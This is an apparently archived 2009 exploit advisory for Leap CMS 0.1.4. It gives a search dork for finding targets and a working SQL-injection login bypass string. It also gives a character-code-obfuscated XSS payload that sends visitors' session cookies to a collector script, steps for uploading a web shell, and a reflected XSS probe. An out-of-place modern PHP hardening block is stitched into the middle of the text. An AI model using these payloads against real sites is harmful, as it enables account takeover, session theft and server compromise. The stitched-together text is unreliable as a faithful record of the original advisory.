SECURITYVULNS:DOC:21757
History: May 01, 2009 - 12:00 a.m.

MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4-->

vulners.com

CMS INFORMATION:

–>WEB: http://leap.gowondesigns.com/
–>DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap
–>CATEGORY: CMS / Lite
–>DESCRIPTION: Leap is a single-file, template-independent, open-source,
standards-compliant, extensible content management system for the web…
–>RELEASED: 2009-03-13

CMS VULNERABILITY:

–>TESTED ON: Firefox 3 and Internet Explorer 6
–>DORK: "Powered by Leap"
–>CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS
–>AFFECTED VERSION: 0.1.4 (possibly earlier versions as well)
–>Discovered Bug date: 2009-04-24
–>Reported Bug date: 2009-04-24
–>Fixed bug date: Not fixed
–>Info patch: Not fixed
–>Author: YEnH4ckEr
–>mail: y3nh4ck3r[at]gmail[dot]com
–>WEB/BLOG: N/A
–>COMMENT: To my girlfriend Marijose… my brother, sister-in-law, parents (and friends xD) for their support.
–>EXTRA-COMMENT: Thanks to all of you for putting up with me! (I love you, little one!)

##############################
//////////////////////////////

AUTHENTICATION BYPASS (SQLi):

/////////////////////////////
##############################

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off ++++++++++++++++++-------->>>>


FILE VULN:

Path –> [HOME_PATH]/leap.php

function checkSession() {

    if($_POST['login']=='Login') {

            // Raw POST values are copied into the session; only the password is hashed (unsalted md5)
            $_SESSION['userMail']=$_POST['email']; $_SESSION['passWord']=md5($_POST['pwd']);

            ....
    }

    // $_SESSION[userMail] is interpolated into the SQL string without escaping, so with
    // magic_quotes_gpc=off a single quote in the e-mail field breaks out of the string literal
    $i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);

            ....

EXPLOIT:

Email Address: nothing' or 1=1#

Password: nothing

#############################
/////////////////////////////

COOKIES STEALING VULN (XSS):

/////////////////////////////
#############################

<<<<---------++++++++++++++ Condition: Add comment ++++++++++++++++++-------->>>>


EXPLOIT:

Go to Link –> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]

There you can comment on the article.

Add a comment with any name/email and message:

<script>document.location=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,101,120,112,108,111,105,116,45,99,111,111,107,105,101,115,47,119,97,105,116,105,110,103,45,102,111,114,46,112,104,112,63,99,107,61)+document.cookie</script>

PHP Script (Cookies Stealer) –> See: http://www.milw0rm.com/exploits/8453
http://www.milw0rm.com/exploits/8471

Note: The exploit fails if the real admin clicks the log-out button, because the stolen session is invalidated.
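A hardened replacement for the checkSession() query quoted in the SQLi section and for the comment output that enables the cookie-stealing XSS. This is an added illustration, not Leap CMS code: it assumes a mysqli connection (with mysqlnd, for get_result()), the same db('prefix') helper and users(mail, pwd) table the advisory shows, and a hypothetical renderComment() helper for the comment page.

```php
<?php
// Added example, not Leap CMS code. Assumes a mysqli connection in $db, the
// db('prefix') helper from the advisory and a users(mail, pwd) table.
function checkSessionFixed(mysqli $db): ?array {
    if (isset($_POST['login']) && $_POST['login'] === 'Login') {
        $_SESSION['userMail'] = (string)($_POST['email'] ?? '');
        // Unsalted md5 is kept only to match the existing schema; it is weak on its own.
        $_SESSION['passWord'] = md5((string)($_POST['pwd'] ?? ''));
    }
    if (!isset($_SESSION['userMail'], $_SESSION['passWord'])) {
        return null;
    }
    // Table names cannot be bound as parameters, so the prefix is whitelisted instead.
    $prefix = db('prefix');
    if (!preg_match('/^[A-Za-z0-9_]*$/', $prefix)) {
        return null;
    }
    // Parameterised query: user input never becomes part of the SQL text, so
    // "nothing' or 1=1#" is compared literally against the mail column, and the
    // result no longer depends on the magic_quotes_gpc setting.
    $stmt = $db->prepare("SELECT * FROM {$prefix}users WHERE mail = ? AND pwd = ?");
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('ss', $_SESSION['userMail'], $_SESSION['passWord']);
    $stmt->execute();
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row ?: null;
}

// Output-side fix for the stored XSS in article comments: escape every
// user-supplied field before it is echoed into the page, so a <script> tag in
// the message is rendered as text instead of executed in the admin's browser.
function renderComment(string $name, string $message): string {
    $esc = fn(string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p><b>' . $esc($name) . '</b>: ' . $esc($message) . '</p>';
}
```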

############################
////////////////////////////

SHELL UPLOAD VULNERABILITY:

////////////////////////////
############################

<<<<---------++++++++++++++ Condition: Be superadmin (above) ++++++++++++++++++-------->>>>


EXPLOIT:

Option: Manage Files. Link –> http://[HOST]/[HOME_PATH]/?admin.system.files

Upload your shell there.

Then go to the link –> http://[HOST]/[HOME_PATH]/shell.php

########################
////////////////////////

XSS (SEARCH POST FORM):

////////////////////////
########################

Search:

"><script>alert(1)</script>

#######################################################################
#######################################################################
##*******************************************************************##

SPECIAL GREETZ TO: Str0ke, JosS, Ulises2K …

####
##-------------------------------------------------------------------##
##
##

GREETZ TO: SPANISH H4ck3Rs community!

##*******************************************************************##
#######################################################################
#######################################################################